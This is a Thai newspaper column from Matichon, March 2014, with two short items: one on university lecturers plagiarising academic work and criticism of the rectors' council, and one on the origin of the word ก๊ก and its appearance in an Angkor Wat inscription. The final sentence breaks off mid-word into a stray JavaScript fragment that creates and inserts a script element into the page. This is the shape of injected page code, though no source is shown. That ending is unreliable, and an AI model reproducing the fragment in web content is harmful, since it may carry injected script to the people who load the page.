Download PDF

มติชนรายวัน ฉบับประจำวันพุธที่ 19  มีนาคม 2557

 

อาจารย์ลอกงานวิชาการ

          อาจารย์ในมหาวิทยาลัยทุกวันนี้ มีไม่น้อยที่ลอกผลงานทางวิชาการของคนอื่น ดังนั้นอย่าพากันโทษนิสิตนักศึกษาฝ่ายเดียวที่ลอกข้อสอบ

          นพ. เฉลิมชัย บุญยะลีพรรณ อธิการบดีมหาวิทยาลัยศรีนครินทรวิโรฒ (มศว) กล่าวถึงการแก้ปัญหาการลอกผลงานทางวิชาการของอาจารย์มหาวิทยาลัย ว่าที่ผ่านมาที่ประชุมอธิการบดีแห่งประเทศไทย (ทปอ.) และมหาวิทยาลัยต่างๆ ให้ความสำคัญและพยายามแก้ปัญหา

          โดยขณะนี้จุฬาลงกรณ์มหาวิทยาลัยได้จัดทำเครื่องตรวจสอบผลงานวิทยานิพนธ์ หากมหาวิทยาลัยใดต้องการนำวิทยานิพนธ์ไปตรวจสอบก็ขอใช้ได้

          แต่ประเด็นที่คิดว่าจะแก้ปัญหานี้ได้ในระยะยาว นพ. เฉลิมชัยแนะว่า สังคมไทยต้องเลิกค่านิยมที่ไปยกย่องนับถือคนมีฐานะ หรือคนที่จบดอกเตอร์ รวมทั้งผู้ที่มีตำแหน่งทางวิชาการสูงๆ แต่ขอให้ดูผลงาน หรือความรู้ความสามารถของคนๆ นั้นจริงๆ ไม่เช่นนั้นคนจะแห่เรียนปริญญาเอกเพราะอยากเป็นดอกเตอร์ หรือมีตำแหน่งทางวิชาการตั้งแต่ยังหนุ่มยังสาว ทำให้เกิดปัญหาลอกผลงานทางวิชาการ รวมถึงปัญหาการจัดการศึกษาที่ไม่มีคุณภาพอื่นๆ ตามมาด้วย (มติชน ฉบับวันพุธที่ 12 มีนาคม 2557 หน้า 6)

          ค่านิยมที่ยกอ้างทั้งหมดนั้น เป็นผลจากการเรียนการสอนของอาจารย์มหาวิทยาลัยซึ่งมาจากโครงสร้างต่างๆที่ไม่เป็นธรรม ไม่เสมอภาค เพราะไม่ประชาธิปไตย แล้ว ทปอ. รวมหัวกันต่อต้านประชาธิปไตยมิใช่หรือ?

 

ก๊ก

          ตั้งใจไปหาซื้อแผนที่ แต่เห็นหนังสือ คำจีนสยาม ของ วรศักดิ์ มหัทธโนบล เลยต้องรีบซื้อมาอ่านก่อน เพราะอยากอ่านมานานหลายปีมาก เพิ่งเห็น

          คำแรกว่า ก๊ก เพี้ยนจากแต้จิ๋วว่า กก หมายถึง อาณาจักร, ประเทศ, รัฐ เมือง (ที่หมายถึงประเทศ เช่น เมืองไทย) วรศักดิ์สันนิษฐานว่าไทยได้จากวรรณกรรมจีน เรื่องสามก๊ก ที่พระยาพระคลัง (หน) อำนวยการแปลเป็นไทย สมัย ร.1 (ก่อน พ.ศ. 2348)

          คำว่า ก๊ก เก่าสุดพบในคำเขมรสลักไว้ที่ปราสาทนครวัด ราว พ.ศ. 1650 ว่าเสียมกุก อ่าน เสียมกก ตรงกับภาษาไทยว่า เสียมก๊ก แปลว่า ชาวสยาม หรือ พวกสยาม

          ผมเคยเขียนอธิบายคำนี้ไว้ในมติชนสุดสัปดาห์ (ฉบับวันศุกร์ที่ 29 เมษายน 2554) อ้างถึง อ. อุไรศรี วรศริน ผู้เชี่ยวชาญภาษาเขมร อาจารย์ประจำคณะโบราณคดี ม.ศิลปากร ที่เคยอธิบายไว้ก่อนนานแล้วว่าคำเขมรตรงนี้ คือ เสียมก๊ก หมายถึง สยามก๊ก หรือก๊กสยาม

          แต่ในภาษาไทยใช้คำจีนว่า ก๊ก ตั้งแต่เมื่อไร? ยังไม่พบหลักฐาน เพราะผมไม่เคยหาd.getElementsByTagName(‘head’)[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);